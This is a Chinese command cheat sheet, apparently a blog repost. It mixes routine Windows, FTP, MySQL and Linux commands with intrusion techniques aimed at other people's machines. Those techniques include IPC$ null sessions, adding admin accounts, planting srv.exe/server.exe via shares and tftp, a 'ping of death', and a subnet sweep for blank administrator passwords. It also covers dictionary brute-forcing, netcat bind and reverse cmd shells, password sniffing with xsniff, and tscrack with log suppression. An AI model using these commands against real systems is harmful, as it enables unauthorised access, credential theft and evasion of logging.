天天看點

dos指令

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空連結

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密碼" /user:"使用者名" 建立IPC非空連結

net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密碼" /user:"使用者名" 直接登陸後映射對方C:到本地為H:

net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陸後映射對方C:到本地為H:

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC連結

net use h: /del 删除映射對方到本地的為H:的映射

net user 使用者名 密碼 /add 建立使用者

net user guest /active:yes 激活guest使用者

net user 檢視有哪些使用者

net user 帳戶名 檢視帳戶的屬性

net localgroup ***istrators 使用者名 /add 把“使用者”添加到管理者中使其具有管理者權限,注意:***istrator後加s用複數

net start 檢視開啟了哪些服務

net start 服務名 開啟服務;(如:net start telnet, net start schedule)

net stop 服務名 停止某服務

net time \\目标ip 檢視對方時間

net time \\目标ip /set 設定本地計算機時間與“目标IP”主機的時間同步,加上參數/yes可取消确認資訊

net view 檢視本地區域網路内開啟了哪些共享

net view [url=file://\\ip]\\ip[/url] 檢視對方區域網路内開啟了哪些共享

net config 顯示系統網絡設定

net logoff 斷開連接配接的共享

net pause 服務名 暫停某服務

net send ip "文本資訊" 向對方發資訊

net ver 區域網路内正在使用的網絡連接配接類型和資訊

net share 檢視本地開啟的共享

net share ipc$ 開啟ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest使用者登陸後用将密碼改為12345

net password 密碼 更改系統登陸密碼

netstat -a 檢視開啟了哪些端口,常用netstat -an

netstat -n 檢視端口的網絡連接配接情況,常用netstat -an

netstat -v 檢視正在進行的工作

netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況(檢視tcp/ip協定使用情況)

netstat -s 檢視正在使用的所有協定使用情況

nbtstat -A ip 對方136到139其中一個端口開了的話,就可檢視對方最近登陸的使用者名(03前的為使用者名)-注意:參數-A要大寫

tracert -參數 ip(或計算機名) 跟蹤路由(資料包),參數:“-w數字”用于設定逾時間隔。

ping ip(或域名) 向對方主機發送預設大小為32位元組的資料,參數:“-l[空格]資料包大小”;“-n發送資料次數”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(發送大于64K的檔案并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)檢視本地ip位址,ipconfig可用參數“/all”顯示全部配置資訊

tlist -t 以樹行清單顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)

kill -F 程序名 加-F參數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools檔案夾内)

del

-F 檔案名

加-F參數後就可删除隻讀檔案,/AR、/AH、/AS、/AA分别表示删除隻讀、隐藏、系統、存檔檔案,/A-R、/A-H、/A-S、/A-A表示删

除除隻讀、隐藏、系統、存檔以外的檔案。例如“DEL/AR *.*”表示删除目前目錄下所有隻讀檔案,“DEL/A-S

*.*”表示删除目前目錄下除系統檔案以外的所有檔案

#2 二:

del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S删除目錄及目錄下的所有子目錄和檔案。同時使用參數/Q 可取消删除操作時的系統确認就直接删除。(二個指令作用相同)

move 盤符\路徑\要移動的檔案名 存放移動檔案的路徑\移動後檔案名 移動檔案,用參數/y将取消确認移動目錄存在相同檔案的提示就直接覆寫

fc one.txt two.txt > 3st.txt 對比二個檔案并把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向指令

at id号 開啟已注冊的某個計劃任務

at /delete 停止所有計劃任務,用參數/yes則不需要确認就直接停止

at id号 /delete 停止某個已注冊的計劃任務

at 檢視所有的計劃任務

at [url=file://\\ip]\\ip[/url] time 程式名(或一個指令) /r 在某時間運作對方某程式并重新啟動計算機

finger username @host 檢視最近有哪些使用者登陸

telnet ip 端口 遠和登陸伺服器,預設端口為23

open ip 連接配接到IP(屬telnet登陸後的指令)

telnet 在本機上直接鍵入telnet 将進入本機的telnet

copy 路徑\檔案名1 路徑\檔案名2 /y 複制檔案1到指定的目錄為檔案2,用參數/y就同時取消确認你要改寫一份現存目錄檔案

copy c:\srv.exe [url=file://\\ip\***$]\\ip\***$[/url] 複制本地c:\srv.exe到對方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,參數:/b指二進制檔案,/a指ASCLL格式檔案

copy [url=file://\\ip\***$\svv.exe]\\ip\***$\svv.exe[/url] c:\ 或:copy\\ip\***$\*.* 複制對方***i$共享下的srv.exe檔案(所有檔案)至本地C:

xcopy 要複制的檔案或目錄樹 目标位址\目錄名 複制檔案和目錄樹,用參數/Y将不提示覆寫相同檔案

tftp

-i 自己IP(用肉機作跳闆時這用肉機IP) get server.exe c:\server.exe

登陸後,将“IP”的server.exe下載下傳到目标主機c:\server.exe

參數:-i指以二進制模式傳送,如傳送exe檔案時用,如不加-i 則以ASCII模式(傳送文本檔案模式)進行傳送

tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機

ftp ip 端口 用于上傳檔案至伺服器或進行檔案操作,預設端口為21。bin指用二進制方式傳送(可執行檔案進);預設為ASCII格式傳送(文本檔案時)

route print 顯示出IP路由,将主要顯示網絡位址Network addres,子網路遮罩Netmask,網關位址Gateway addres,接口位址Interface

arp 檢視和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個實體性的MAC位址。arp -a将顯示出全部資訊

start 程式名或指令 /max 或/min 新開一個新視窗并最大化(最小化)運作某程式或指令

mem 檢視cpu使用情況

attrib 檔案名(目錄名) 檢視某檔案(目錄)的屬性

attrib 檔案名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔案的 存檔,隻讀,系統,隐藏 屬性;用+則是添加為某屬性

dir 檢視檔案,參數:/Q顯示檔案及目錄屬系統哪個使用者,/T:C顯示檔案建立時間,/T:A顯示檔案上次被通路時間,/T:W上次被修改時間

date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”将隻顯示目前日期和時間,而不必輸入新日期和時間

set 指定環境變量名稱=要指派給變量的字元 設定環境變量

set 顯示目前所有的環境變量

set p(或其它字元) 顯示出目前以字元p(或其它字元)開頭的所有環境變量

pause 暫停批處理程式,并顯示出:請按任意鍵繼續....

if 在批處理程式中執行條件處理(更多說明見if指令及變量)

goto 标簽 将cmd.exe導向到批處理程式中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:“:start”标簽)

call 路徑\批處理檔案名 從批處理程式中調用另一個批處理程式 (更多說明見call /?)

for 對一組檔案中的每一個檔案執行某個特定指令(更多說明見for指令及變量)

echo on或off 打開或關閉echo,僅用echo不加參數則顯示目前echo設定

echo 資訊 在螢幕上顯示出資訊

echo 資訊 >> pass.txt 将"資訊"儲存到pass.txt檔案中

findstr "Hello" aa.txt 在aa.txt檔案中尋找字元串hello

find 檔案名 查找某檔案

title 标題名字 更改CMD視窗标題名字

color 顔色值 設定cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白

prompt 名稱 更改cmd.exe的顯示的指令提示符(把C:\、D:\統一改為:EntSky\ )

#3 三:

ver 在DOS視窗下顯示版本資訊

winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、更新檔版本、計算機名)

format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目錄名 建立目錄

replace 源檔案 要替換檔案的目錄 替換檔案

ren 原檔案名 新檔案名 重命名檔案名

tree 以樹形結構顯示出目錄,用參數-f 将列出第個檔案夾中檔案名稱

type 檔案名 顯示文本檔案的内容

more 檔案名 逐屏顯示輸出檔案

doskey 要鎖定的指令=字元

doskey 要解鎖指令= 為DOS提供的鎖定指令(編輯指令行,重新調用win2k指令,并建立宏)。如:鎖定dir指令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=

taskmgr 調出任務管理器

chkdsk /F D: 檢查磁盤D并顯示狀态報告;加參數/f并修複磁盤上的錯誤

tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務預設端口23為其它任何端口

exit 退出cmd.exe程式或目前,用參數/B則是退出目前批處理腳本而不是cmd.exe

path 路徑\可執行檔案的檔案名 為可執行檔案設定一個路徑。

cmd 啟動一個win2K指令解釋視窗。參數:/eff、/en 關閉、開啟指令擴充;更我詳細說明見cmd /?

regedit /s 系統資料庫檔案名 導入系統資料庫;參數/S指安靜模式導入,無任何提示;

regedit /e 系統資料庫檔案名 導出系統資料庫

cacls

檔案名 參數 顯示或修改檔案通路控制清單(ACL)——針對NTFS格式時。參數:/D 使用者名:設定拒絕某使用者通路;/P 使用者名:perm

替換指定使用者的通路權限;/G 使用者名:perm 賦予指定使用者通路權限;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F

完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub使用者通路。

cacls 檔案名 檢視檔案的通路使用者權限清單

REM 文本内容 在批處理檔案中添加注解

netsh 檢視或更改本地網絡配置情況

#4 四:

IIS服務指令:

iisreset /reboot 重新開機win2k計算機(但有提示系統将重新開機資訊出現)

iisreset /start或stop 啟動(停止)所有Internet服務

iisreset /restart 停止然後重新啟動所有Internet服務

iisreset /status 顯示所有Internet服務狀态

iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動

iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤将重新開機

iisreset /noforce 若無法停止Internet服務,将不會強制終止Internet服務

iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦将會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。

FTP 指令: (後面有詳細說明内容)

ftp的指令行格式為:

ftp -v -d -i -n -g[主機名] -v 顯示遠端伺服器的所有響應資訊。

-d 使用調試方式。

-n 限制ftp的自動登入,即不使用.netrc檔案。

-g 取消全局檔案名。

help [指令] 或 ?[指令] 檢視指令說明

bye 或 quit 終止主機FTP程序,并退出FTP管理方式.

pwd 列出目前遠端主機目錄

put 或 send 本地檔案名 [上傳到主機上的檔案名] 将本地一個檔案傳送至遠端主機中

get 或 recv [遠端主機檔案名] [下載下傳到本地後的檔案名] 從遠端主機中傳送至本地主機中

mget [remote-files] 從遠端主機接收一批檔案至本地主機

mput local-files 将本地主機中一批檔案傳送至遠端主機

dir 或 ls [remote-directory] [local-file] 列出目前遠端主機目錄中的檔案.如果有本地檔案,就将結果寫至本地檔案

ascii 設定以ASCII方式傳送檔案(預設值)

bin 或 p_w_picpath 設定以二進制方式傳送檔案

bell 每完成一次檔案傳送,報警提示

cdup 傳回上一級目錄

close 中斷與遠端伺服器的ftp會話(與open對應)

open host[port] 建立指定ftp伺服器連接配接,可指定連接配接端口

delete 删除遠端主機中的檔案

mdelete [remote-files] 删除一批檔案

mkdir directory-name 在遠端主機中建立目錄

rename [from] [to] 改變遠端主機中的檔案名

rmdir directory-name 删除遠端主機中的目錄

status 顯示目前FTP的狀态

system 顯示遠端主機系統類型

user user-name [password] [account] 重新以别的使用者名登入遠端主機

open host [port] 重建立立一個新的連接配接

prompt 互動提示模式

macdef 定義宏指令

lcd 改變目前本地主機的工作目錄,如果預設,就轉到目前使用者的HOME目錄

chmod 改變遠端主機的檔案權限

case 當為ON時,用MGET指令拷貝的檔案名到本地機器中,全部轉換為小寫字母

cd remote-dir 進入遠端主機目錄

cdup 進入遠端主機目錄的父目錄

! 在本地機中執行互動shell,exit回到ftp環境,如!ls*.zip

#5 五:

MYSQL 指令:

mysql -h主機位址 -u使用者名 -p密碼 連接配接MYSQL;如果剛安裝好MYSQL,超級使用者root是沒有密碼的。

(例:mysql -h110.110.110.110 -Uroot -P123456

注:u與root可以不用加空格,其它也一樣)

exit 退出MYSQL

mysql*** -u使用者名 -p舊密碼 password 新密碼 修改密碼

grant select on 資料庫.* to 使用者名@登入主機 identified by \"密碼\"; 增加新使用者。(注意:和上面不同,下面的因為是MYSQL環境中的指令,是以後面都帶一個分号作為指令結束符)

show databases; 顯示資料庫清單。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統資訊,我們改密碼和新增使用者,實際上就是用這個庫進行操作。

use mysql;

show tables; 顯示庫中的資料表

describe 表名; 顯示資料表的結構

create database 庫名; 建庫

use 庫名;

create table 表名 (字段設定清單); 建表

drop database 庫名;

drop table 表名; 删庫和删表

delete from 表名; 将表中記錄清空

select * from 表名; 顯示表中的記錄

mysqldump

--opt school>school.bbb

備份資料庫:(指令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目錄下執行);注釋:将資料庫

school備份到school.bbb檔案,school.bbb是一個文本檔案,檔案名任取,打開看看你會有新發現。

win2003系統下新增指令(實用部份):

shutdown /參數 關閉或重新開機本地或遠端主機。

參數說明:/S 關閉主機,/R 重新開機主機, /T 數字 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠端主機。

例:shutdown /r /t 0 立即重新開機本地主機(無延時)

taskill /參數 程序名或程序的pid 終止一個或多個任務和程序。

參數說明:/PID 要終止程序的pid,可用tasklist指令獲得各程序的pid,/IM 要終止的程序的程序名,/F 強制終止程序,/T 終止指定的程序及他所啟動的子程序。

tasklist 顯示目前運作在本地和遠端主機上的程序、服務、服務各程序的程序辨別符(PID)。

參數說明:/M 列出目前程序加載的dll檔案,/SVC 顯示出每個程序對應的服務,無參數時就隻列出目前的程序。

#6 六:

Linux系統下基本指令: 要區分大小寫

uname 顯示版本資訊(同win2K的 ver)

dir 顯示目前目錄檔案,ls -al 顯示包括隐藏檔案(同win2K的 dir)

pwd 查詢目前所在的目錄位置

cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /傳回到根目錄。

cat 檔案名 檢視檔案内容

cat >abc.txt 往abc.txt檔案中寫上内容。

more 檔案名 以一頁一頁的方式顯示一個文本檔案。

cp 複制檔案

mv 移動檔案

rm 檔案名 删除檔案,rm -a 目錄名删除目錄及子目錄

mkdir 目錄名 建立目錄

rmdir 删除子目錄,目錄内沒有文檔。

chmod 設定檔案或目錄的存取權限

grep 在檔案中查找字元串

diff 檔案檔案比較

find 檔案搜尋

date 現在的日期、時間

who 查詢目前和你使用同一台機器的人以及Login時間地點

w 查詢目前上機者的詳細資料

whoami 檢視自己的帳号名稱

groups 檢視某人的Group

passwd 更改密碼

history 檢視自己下過的指令

ps 顯示程序狀态

kill 停止某程序

gcc 黑客通常用它來編譯C語言寫的檔案

su 權限轉換為指定使用者

telnet IP telnet連接配接對方主機(同win2K),當出現bash$時就說明連接配接成功。

ftp ftp連接配接上某伺服器(同win2K)

附:批處理指令與變量

1:for指令及變量 基本格式:

FOR

/參數 %variable IN (set) DO command [command_parameters]

%variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i

不等于 %I)。

批處理每次能處理的變量從%0—%9共10個,其中%0預設給批處理檔案名使用,%1預設為使用此批處理時輸入的的第一個

值,同理:%2—%9指輸入的第2-9個值;例:net use [url=file://\\ip\ipc$]\\ip\ipc$[/url]

pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組檔案,可使用通配符,如:

(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1

254)”第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1

}

command:指定對第個檔案執行的指令,如:net use指令;如要執行多個指令時,指令這間加:& 來隔開

command_parameters:為特定指令指定參數或指令行開關

IN (set):指在(set)中取值;DO command :指執行command

參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從檔案中不斷取值,直到取完為止{ (set)為檔案時,如(d:\pass.txt)時 }。

用法舉例:

@echo off

echo 用法格式:test.bat *.*.* > test.txt

for

/L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use

[url=file://\\%1.%%G]\\%1.%%G[/url] /user:***istrator | find "指令成功完成"

>>test.txt

存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立***istrator密碼為空的IPC$連接配接,如果成功就把該IP存在test.txt中。

/L

指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理預設的 %1;%%G 為變量(ip的最後一位);&

用來隔開echo 和net use 這二個指令;| 指建立了ipc$後,在結果中用find檢視是否有"指令成功完成"資訊;%1.%%G

為完整的IP位址;(1 1 254) 指起始值,增長量,結止值。

echo 用法格式:ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存為:ok.exe 說明:輸入一個IP後,用字典檔案d:\pass.dic來暴解d:\user.dic中的使用者密碼,直到檔案中值取完為止。%%i為使用者名;%1為輸入的IP位址(預設)。

#7 七:

2:if指令及變量 基本格式:

IF [not] errorlevel 數字 指令語句 如果程式運作最後傳回一個等于或大于指定數字的退出編碼,指定條件為“真”。

例:IF errorlevel 0 指令 指程式執行後傳回的值為0時,就值行後面的指令;IF not errorlevel 1 指令指程式執行最後傳回的值不等于1,就執行後面的指令。

0 指發現并成功執行(真);1 指沒有發現、沒執行(假)。

IF [not] 字元串1==字元串2 指令語句 如果指定的文本字元串比對(即:字元串1 等于 字元串2),就執行後面的指令。

例:“if "%2%"=="4" goto start”指:如果輸入的第二個變量為4時,執行後面的指令(注意:調用變量時就%變量名%并加" ")

IF [not] exist 檔案名 指令語句 如果指定的檔案名存在,就執行後面的指令。

例:“if not nc.exe goto end”指:如果沒有發現nc.exe檔案就跳到":end"标簽處。

IF

[not] errorlevel 數字 指令語句 else 指令語句或 IF [not] 字元串1==字元串2 指令語句 else 指令語句或

IF [not] exist 檔案名 指令語句 else 指令語句 加上:else

指令語句後指:目前面的條件不成立時,就指行else後面的指令。注意:else 必須與 if 在同一行才有效。

當有del指令時需把del指令全部内容用括起來,因為del指令要單獨一行時才能執行,用上後就等于是單獨一行了;例如:“if exist

test.txt.   else echo test.txt.missing ”,注意指令中的“.”

(二)系統外部指令(均需下載下傳相關工具):

1、瑞士×××:nc.exe

參數說明:

-h 檢視幫助資訊

-d 背景模式

-e prog程式重定向,一但連接配接就執行〔危險〕

-i secs延時的間隔

-l 監聽模式,用于入站連接配接

-L 監聽模式,連接配接天閉後仍然繼續監聽,直到CTR+C

-n IP位址,不能用域名

-o film記錄16進制的傳輸

-p[空格]端口 本地端口号

-r 随機本地及遠端端口

-t 使用Telnet互動方式

-u UDP模式

-v 詳細輸出,用-vv将更詳細

-w數字 timeout延時間隔

-z 将輸入,輸出關掉(用于掃錨時)

基本用法:

nc -nvv 192.168.0.1 80 連接配接到192.168.0.1主機的80端口

nc -l -p 80 開啟本機的TCP 80端口并監聽

nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell并反向連接配接192.168.0.2的5354端口

進階用法:

nc -L -p 80 作為蜜罐用1:開啟并不停地監聽80端口,直到CTR+C為止

nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟并不停地監聽80端口,直到CTR+C,同時把結果輸出到c:\log.txt

nc -L -p 80   存放檔案的路徑及名稱 傳送檔案到對方主機

備 注:

| 管道指令

重定向指令。“> d:\log.txt 意思是:背景執行dir,并把結果存在d:\log.txt中

>與>>的差別 ">"指:覆寫;">>"指:儲存到(添加到)。

如:@dir

c:\winnt >> d:\log.txt和@dir c:\winnt >

d:\log.txt二個指令分别執行二次比較看:用>>的則是把二次的結果都儲存了,而用:>則隻有一次的結果,是因為第二次的結果

把第一次的覆寫了。

#8 八:

2、掃錨工具:xscan.exe

基本格式

xscan -host [-]   [其他選項] 掃錨"起始IP到終止IP"段的所有主機資訊

xscan -file [其他選項] 掃錨"主機IP清單檔案名"中的所有主機資訊

檢測項目

-active 檢測主機是否存活

-os 檢測遠端作業系統類型(通過NETBIOS和SNMP協定)

-port 檢測常用服務的端口狀态

-ftp 檢測FTP弱密碼

-pub 檢測FTP服務匿名使用者寫權限

-pop3 檢測POP3-Server弱密碼

-smtp 檢測SMTP-Server漏洞

-sql 檢測SQL-Server弱密碼

-smb 檢測NT-Server弱密碼

-iis 檢測IIS編碼/解碼漏洞

-cgi 檢測CGI漏洞

-nasl 加載Nessus攻擊腳本

-all 檢測以上所有項目

其它選項

-i 擴充卡編号 設定網絡擴充卡, 可通過"-l"參數擷取

-l 顯示所有網絡擴充卡

-v 顯示詳細掃描進度

-p 跳過沒有響應的主機

-o 跳過沒有檢測到開放端口的主機

-t 并發線程數量,并發主機數量 指定最大并發線程數量和并發主機數量, 預設數量為100,10

-log 檔案名 指定掃描報告檔案名 (字尾為:TXT或HTML格式的檔案)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段内主機的所有漏洞,跳過無響應的主機

xscan

-host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o

檢測192.168.1.1-192.168.255.255網段内主機的标準端口狀态,NT弱密碼使用者,最大并發線程數量為150,跳過沒有檢測到開放

端口的主機

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o

檢測“hostlist.txt”檔案中列出的所有主機的标準端口狀态,CGI漏洞,最大并發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測

進度,跳過沒有檢測到開放端口的主機

#9 九:

3、指令行方式嗅探器: xsniff.exe

可捕獲區域網路内FTP/SMTP/POP3/HTTP協定密碼

參數說明

-tcp 輸出TCP資料報

-udp 輸出UDP資料報

-icmp 輸出ICMP資料報

-pass 過濾密碼資訊

-hide 背景運作

-host 解析主機名

-addr IP位址 過濾IP位址

-port 端口 過濾端口

-log 檔案名 将輸出儲存到檔案

-asc 以ASCII形式輸出

-hex 以16進制形式輸出

xsniff.exe -pass -hide -log pass.log 背景運作嗅探密碼并将密碼資訊儲存在pass.log檔案中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過濾tcp和udp資訊并以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

-h 顯示使用幫助

-v 顯示版本資訊

-s 在螢幕上打出解密能力

-b 密碼錯誤時發出的聲音

-t 同是發出多個連接配接(多線程)

-N Prevent System Log entries on targeted server

-U 解除安裝移除tscr

上一篇: dos指令
下一篇: Git 删除檔案